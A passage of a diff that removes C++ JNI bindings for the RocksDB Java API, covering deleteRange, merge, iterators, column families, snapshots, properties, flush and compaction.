-                          begin_key);
-  if (env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete[] begin_key;
-    return false;
-  }
-  rocksdb::Slice begin_key_slice(reinterpret_cast<char*>(begin_key),
-                                 jbegin_key_len);
-
-  jbyte* end_key = new jbyte[jend_key_len];
-  env->GetByteArrayRegion(jend_key, jend_key_off, jend_key_len, end_key);
-  if (env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete[] begin_key;
-    delete[] end_key;
-    return false;
-  }
-  rocksdb::Slice end_key_slice(reinterpret_cast<char*>(end_key), jend_key_len);
-
-  rocksdb::Status s =
-      db->DeleteRange(write_options, cf_handle, begin_key_slice, end_key_slice);
-
-  // cleanup
-  delete[] begin_key;
-  delete[] end_key;
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    deleteRange
- * Signature: (J[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_deleteRange__J_3BII_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jbegin_key,
-    jint jbegin_key_off, jint jbegin_key_len, jbyteArray jend_key,
-    jint jend_key_off, jint jend_key_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  rocksdb_delete_range_helper(env, db, default_write_options, nullptr,
-                              jbegin_key, jbegin_key_off, jbegin_key_len,
-                              jend_key, jend_key_off, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    deleteRange
- * Signature: (J[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_deleteRange__J_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jbegin_key,
-    jint jbegin_key_off, jint jbegin_key_len, jbyteArray jend_key,
-    jint jend_key_off, jint jend_key_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_delete_range_helper(env, db, default_write_options, cf_handle,
-                                jbegin_key, jbegin_key_off, jbegin_key_len,
-                                jend_key, jend_key_off, jend_key_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(
-        env, rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    deleteRange
- * Signature: (JJ[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_deleteRange__JJ_3BII_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options,
-    jbyteArray jbegin_key, jint jbegin_key_off, jint jbegin_key_len,
-    jbyteArray jend_key, jint jend_key_off, jint jend_key_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  rocksdb_delete_range_helper(env, db, *write_options, nullptr, jbegin_key,
-                              jbegin_key_off, jbegin_key_len, jend_key,
-                              jend_key_off, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    deleteRange
- * Signature: (JJ[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_deleteRange__JJ_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options,
-    jbyteArray jbegin_key, jint jbegin_key_off, jint jbegin_key_len,
-    jbyteArray jend_key, jint jend_key_off, jint jend_key_len,
-    jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_delete_range_helper(env, db, *write_options, cf_handle, jbegin_key,
-                                jbegin_key_off, jbegin_key_len, jend_key,
-                                jend_key_off, jend_key_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(
-        env, rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Merge
-
-/**
- * @return true if the merge succeeded, false if a Java Exception was thrown
- */
-bool rocksdb_merge_helper(JNIEnv* env, rocksdb::DB* db,
-                          const rocksdb::WriteOptions& write_options,
-                          rocksdb::ColumnFamilyHandle* cf_handle,
-                          jbyteArray jkey, jint jkey_off, jint jkey_len,
-                          jbyteArray jval, jint jval_off, jint jval_len) {
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    return false;
-  }
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  jbyte* value = new jbyte[jval_len];
-  env->GetByteArrayRegion(jval, jval_off, jval_len, value);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] value;
-    delete [] key;
-    return false;
-  }
-  rocksdb::Slice value_slice(reinterpret_cast<char*>(value), jval_len);
-
-  rocksdb::Status s;
-  if (cf_handle != nullptr) {
-    s = db->Merge(write_options, cf_handle, key_slice, value_slice);
-  } else {
-    s = db->Merge(write_options, key_slice, value_slice);
-  }
-
-  // cleanup
-  delete [] value;
-  delete [] key;
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    merge
- * Signature: (J[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_merge__J_3BII_3BII(JNIEnv* env, jobject jdb,
-                                                 jlong jdb_handle,
-                                                 jbyteArray jkey, jint jkey_off,
-                                                 jint jkey_len, jbyteArray jval,
-                                                 jint jval_off, jint jval_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-
-  rocksdb_merge_helper(env, db, default_write_options, nullptr, jkey, jkey_off,
-                       jkey_len, jval, jval_off, jval_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    merge
- * Signature: (J[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_merge__J_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len, jbyteArray jval, jint jval_off, jint jval_len,
-    jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_merge_helper(env, db, default_write_options, cf_handle, jkey,
-                         jkey_off, jkey_len, jval, jval_off, jval_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    merge
- * Signature: (JJ[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_merge__JJ_3BII_3BII(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jbyteArray jval,
-    jint jval_off, jint jval_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options_handle);
-
-  rocksdb_merge_helper(env, db, *write_options, nullptr, jkey, jkey_off,
-                       jkey_len, jval, jval_off, jval_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    merge
- * Signature: (JJ[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_merge__JJ_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jbyteArray jval,
-    jint jval_off, jint jval_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options =
-      reinterpret_cast<rocksdb::WriteOptions*>(jwrite_options_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_merge_helper(env, db, *write_options, cf_handle, jkey, jkey_off,
-                         jkey_len, jval, jval_off, jval_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::~DB()
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksDB_disposeInternal(
-    JNIEnv* env, jobject java_db, jlong jhandle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jhandle);
-  assert(db != nullptr);
-  delete db;
-}
-
-jlong rocksdb_iterator_helper(
-    rocksdb::DB* db, rocksdb::ReadOptions read_options,
-    rocksdb::ColumnFamilyHandle* cf_handle) {
-  rocksdb::Iterator* iterator = nullptr;
-  if (cf_handle != nullptr) {
-    iterator = db->NewIterator(read_options, cf_handle);
-  } else {
-    iterator = db->NewIterator(read_options);
-  }
-  return reinterpret_cast<jlong>(iterator);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iterator
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RocksDB_iterator__J(
-    JNIEnv* env, jobject jdb, jlong db_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  return rocksdb_iterator_helper(db, rocksdb::ReadOptions(),
-      nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iterator
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_RocksDB_iterator__JJ(
-    JNIEnv* env, jobject jdb, jlong db_handle,
-    jlong jread_options_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-      jread_options_handle);
-  return rocksdb_iterator_helper(db, read_options,
-      nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iteratorCF
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_RocksDB_iteratorCF__JJ(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  return rocksdb_iterator_helper(db, rocksdb::ReadOptions(),
-        cf_handle);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iteratorCF
- * Signature: (JJJ)J
- */
-jlong Java_org_rocksdb_RocksDB_iteratorCF__JJJ(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong jcf_handle,
-    jlong jread_options_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-      jread_options_handle);
-  return rocksdb_iterator_helper(db, read_options,
-        cf_handle);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    iterators
- * Signature: (J[JJ)[J
- */
-jlongArray Java_org_rocksdb_RocksDB_iterators(
-    JNIEnv* env, jobject jdb, jlong db_handle,
-    jlongArray jcolumn_family_handles, jlong jread_options_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-        jread_options_handle);
-
-  std::vector<rocksdb::ColumnFamilyHandle*> cf_handles;
-  if (jcolumn_family_handles != nullptr) {
-    const jsize len_cols = env->GetArrayLength(jcolumn_family_handles);
-    jlong* jcfh = env->GetLongArrayElements(jcolumn_family_handles, nullptr);
-    if(jcfh == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    for (jsize i = 0; i < len_cols; i++) {
-      auto* cf_handle =
-          reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcfh[i]);
-      cf_handles.push_back(cf_handle);
-    }
-
-    env->ReleaseLongArrayElements(jcolumn_family_handles, jcfh, JNI_ABORT);
-  }
-
-  std::vector<rocksdb::Iterator*> iterators;
-  rocksdb::Status s = db->NewIterators(read_options,
-      cf_handles, &iterators);
-  if (s.ok()) {
-    jlongArray jLongArray =
-        env->NewLongArray(static_cast<jsize>(iterators.size()));
-    if(jLongArray == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    for (std::vector<rocksdb::Iterator*>::size_type i = 0;
-        i < iterators.size(); i++) {
-      env->SetLongArrayRegion(jLongArray, static_cast<jsize>(i), 1,
-                              const_cast<jlong*>(reinterpret_cast<const jlong*>(&iterators[i])));
-      if(env->ExceptionCheck()) {
-        // exception thrown: ArrayIndexOutOfBoundsException
-        env->DeleteLocalRef(jLongArray);
-        return nullptr;
-      }
-    }
-
-    return jLongArray;
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return nullptr;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getDefaultColumnFamily
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RocksDB_getDefaultColumnFamily(
-    JNIEnv* env, jobject jobj, jlong jdb_handle) {
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = db_handle->DefaultColumnFamily();
-  return reinterpret_cast<jlong>(cf_handle);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    createColumnFamily
- * Signature: (J[BJ)J
- */
-jlong Java_org_rocksdb_RocksDB_createColumnFamily(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jbyteArray jcolumn_name, jlong jcolumn_options) {
-  rocksdb::ColumnFamilyHandle* handle;
-  jboolean has_exception = JNI_FALSE;
-  std::string column_name = rocksdb::JniUtil::byteString<std::string>(env,
-    jcolumn_name,
-    [](const char* str, const size_t len) { return std::string(str, len); },
-    &has_exception);
-  if(has_exception == JNI_TRUE) {
-    // exception occurred
-    return 0;
-  }
-
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cfOptions =
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jcolumn_options);
-
-  rocksdb::Status s = db_handle->CreateColumnFamily(
-      *cfOptions, column_name, &handle);
-
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(handle);
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    dropColumnFamily
- * Signature: (JJ)V;
- */
-void Java_org_rocksdb_RocksDB_dropColumnFamily(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jcf_handle) {
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto* db_handle = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::Status s = db_handle->DropColumnFamily(cf_handle);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Method:    getSnapshot
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RocksDB_getSnapshot(
-    JNIEnv* env, jobject jdb, jlong db_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  const rocksdb::Snapshot* snapshot = db->GetSnapshot();
-  return reinterpret_cast<jlong>(snapshot);
-}
-
-/*
- * Method:    releaseSnapshot
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_RocksDB_releaseSnapshot(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong snapshot_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* snapshot = reinterpret_cast<rocksdb::Snapshot*>(snapshot_handle);
-  db->ReleaseSnapshot(snapshot);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getProperty0
- * Signature: (JLjava/lang/String;I)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_RocksDB_getProperty0__JLjava_lang_String_2I(
-    JNIEnv* env, jobject jdb, jlong db_handle, jstring jproperty,
-    jint jproperty_len) {
-  const char* property = env->GetStringUTFChars(jproperty, nullptr);
-  if(property == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  rocksdb::Slice property_slice(property, jproperty_len);
-
-  auto *db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  std::string property_value;
-  bool retCode = db->GetProperty(property_slice, &property_value);
-  env->ReleaseStringUTFChars(jproperty, property);
-
-  if (retCode) {
-    return env->NewStringUTF(property_value.c_str());
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotFound());
-  return nullptr;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getProperty0
- * Signature: (JJLjava/lang/String;I)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_RocksDB_getProperty0__JJLjava_lang_String_2I(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong jcf_handle,
-    jstring jproperty, jint jproperty_len) {
-  const char* property = env->GetStringUTFChars(jproperty, nullptr);
-  if(property == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  rocksdb::Slice property_slice(property, jproperty_len);
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  std::string property_value;
-  bool retCode = db->GetProperty(cf_handle, property_slice, &property_value);
-  env->ReleaseStringUTFChars(jproperty, property);
-
-  if (retCode) {
-    return env->NewStringUTF(property_value.c_str());
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotFound());
-  return nullptr;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getLongProperty
- * Signature: (JLjava/lang/String;I)L;
- */
-jlong Java_org_rocksdb_RocksDB_getLongProperty__JLjava_lang_String_2I(
-    JNIEnv* env, jobject jdb, jlong db_handle, jstring jproperty,
-    jint jproperty_len) {
-  const char* property = env->GetStringUTFChars(jproperty, nullptr);
-  if(property == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  rocksdb::Slice property_slice(property, jproperty_len);
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  uint64_t property_value = 0;
-  bool retCode = db->GetIntProperty(property_slice, &property_value);
-  env->ReleaseStringUTFChars(jproperty, property);
-
-  if (retCode) {
-    return property_value;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotFound());
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getLongProperty
- * Signature: (JJLjava/lang/String;I)L;
- */
-jlong Java_org_rocksdb_RocksDB_getLongProperty__JJLjava_lang_String_2I(
-    JNIEnv* env, jobject jdb, jlong db_handle, jlong jcf_handle,
-    jstring jproperty, jint jproperty_len) {
-  const char* property = env->GetStringUTFChars(jproperty, nullptr);
-  if(property == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  rocksdb::Slice property_slice(property, jproperty_len);
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  uint64_t property_value;
-  bool retCode = db->GetIntProperty(cf_handle, property_slice, &property_value);
-  env->ReleaseStringUTFChars(jproperty, property);
-
-  if (retCode) {
-    return property_value;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotFound());
-  return 0;
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Flush
-
-void rocksdb_flush_helper(
-    JNIEnv* env, rocksdb::DB* db, const rocksdb::FlushOptions& flush_options,
-  rocksdb::ColumnFamilyHandle* column_family_handle) {
-  rocksdb::Status s;
-  if (column_family_handle != nullptr) {
-    s = db->Flush(flush_options, column_family_handle);
-  } else {
-    s = db->Flush(flush_options);
-  }
-  if (!s.ok()) {
-      rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    flush
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_RocksDB_flush__JJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jflush_options) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* flush_options =
-      reinterpret_cast<rocksdb::FlushOptions*>(jflush_options);
-  rocksdb_flush_helper(env, db, *flush_options, nullptr);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    flush
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_RocksDB_flush__JJJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jflush_options, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* flush_options =
-      reinterpret_cast<rocksdb::FlushOptions*>(jflush_options);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  rocksdb_flush_helper(env, db, *flush_options, cf_handle);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::CompactRange - Full
-
-void rocksdb_compactrange_helper(JNIEnv* env, rocksdb::DB* db,
-    rocksdb::ColumnFamilyHandle* cf_handle, jboolean jreduce_level,
-    jint jtarget_level, jint jtarget_path_id) {
-
-  rocksdb::Status s;
-  rocksdb::CompactRangeOptions compact_options;
-  compact_options.change_level = jreduce_level;
-  compact_options.target_level = jtarget_level;
-  compact_options.target_path_id = static_cast<uint32_t>(jtarget_path_id);
-  if (cf_handle != nullptr) {
-    s = db->CompactRange(compact_options, cf_handle, nullptr, nullptr);
-  } else {
-    // backwards compatibility
-    s = db->CompactRange(compact_options, nullptr, nullptr);
-  }
-
-  if (s.ok()) {
-    return;
-  }
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    compactRange0
- * Signature: (JZII)V
- */
-void Java_org_rocksdb_RocksDB_compactRange0__JZII(JNIEnv* env,
-    jobject jdb, jlong jdb_handle, jboolean jreduce_level,
-    jint jtarget_level, jint jtarget_path_id) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb_compactrange_helper(env, db, nullptr, jreduce_level,
-      jtarget_level, jtarget_path_id);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    compactRange
- * Signature: (JZIIJ)V
- */
-void Java_org_rocksdb_RocksDB_compactRange__JZIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-     jboolean jreduce_level, jint jtarget_level,
-     jint jtarget_path_id, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  rocksdb_compactrange_helper(env, db, cf_handle, jreduce_level,
-      jtarget_level, jtarget_path_id);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::CompactRange - Range
-
-/**
- * @return true if the compact range succeeded, false if a Java Exception
- *     was thrown
- */
-bool rocksdb_compactrange_helper(JNIEnv* env, rocksdb::DB* db,
-    rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jbegin, jint jbegin_len,
-    jbyteArray jend, jint jend_len, jboolean jreduce_level, jint jtarget_level,
-    jint jtarget_path_id) {
-
-  jbyte* begin = env->GetByteArrayElements(jbegin, nullptr);
-  if(begin == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return false;
-  }
-
-  jbyte* end = env->GetByteArrayElements(jend, nullptr);
-  if(end == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseByteArrayElements(jbegin, begin, JNI_ABORT);
-    return false;
-  }
-
-  const rocksdb::Slice begin_slice(reinterpret_cast<char*>(begin), jbegin_len);
-  const rocksdb::Slice end_slice(reinterpret_cast<char*>(end), jend_len);
-
-  rocksdb::Status s;
-  rocksdb::CompactRangeOptions compact_options;
-  compact_options.change_level = jreduce_level;
-  compact_options.target_level = jtarget_level;
-  compact_options.target_path_id = static_cast<uint32_t>(jtarget_path_id);
-  if (cf_handle != nullptr) {
-    s = db->CompactRange(compact_options, cf_handle, &begin_slice, &end_slice);
-  } else {
-    // backwards compatibility
-    s = db->CompactRange(compact_options, &begin_slice, &end_slice);
-  }
-
-  env->ReleaseByteArrayElements(jend, end, JNI_ABORT);
-  env->ReleaseByteArrayElements(jbegin, begin, JNI_ABORT);
-
-  if (s.ok()) {
-    return true;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return false;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    compactRange0
- * Signature: (J[BI[BIZII)V
- */
-void Java_org_rocksdb_RocksDB_compactRange0__J_3BI_3BIZII(JNIEnv* env,
-    jobject jdb, jlong jdb_handle, jbyteArray jbegin, jint jbegin_len,
-    jbyteArray jend, jint jend_len, jboolean jreduce_level,
-    jint jtarget_level, jint jtarget_path_id) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb_compactrange_helper(env, db, nullptr, jbegin, jbegin_len,
-      jend, jend_len, jreduce_level, jtarget_level, jtarget_path_id);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    compactRange
- * Signature: (JJ[BI[BIZII)V
- */
-void Java_org_rocksdb_RocksDB_compactRange__J_3BI_3BIZIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jbegin,
-    jint jbegin_len, jbyteArray jend, jint jend_len,
-    jboolean jreduce_level, jint jtarget_level,
-    jint jtarget_path_id, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  rocksdb_compactrange_helper(env, db, cf_handle, jbegin, jbegin_len,
-      jend, jend_len, jreduce_level, jtarget_level, jtarget_path_id);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::PauseBackgroundWork
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    pauseBackgroundWork
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksDB_pauseBackgroundWork(
-    JNIEnv* env, jobject jobj, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto s = db->PauseBackgroundWork();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::ContinueBackgroundWork
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    continueBackgroundWork
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksDB_continueBackgroundWork(
-    JNIEnv* env, jobject jobj, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto s = db->ContinueBackgroundWork();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::GetLatestSequenceNumber
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getLatestSequenceNumber
- * Signature: (J)V
- */
-jlong Java_org_rocksdb_RocksDB_getLatestSequenceNumber(JNIEnv* env,
-    jobject jdb, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  return db->GetLatestSequenceNumber();
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB enable/disable file deletions
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    enableFileDeletions
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksDB_disableFileDeletions(JNIEnv* env,
-    jobject jdb, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::Status s = db->DisableFileDeletions();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    enableFileDeletions
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_RocksDB_enableFileDeletions(JNIEnv* env,
-    jobject jdb, jlong jdb_handle, jboolean jforce) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::Status s = db->EnableFileDeletions(jforce);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::GetUpdatesSince
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    getUpdatesSince
- * Signature: (JJ)J
- */
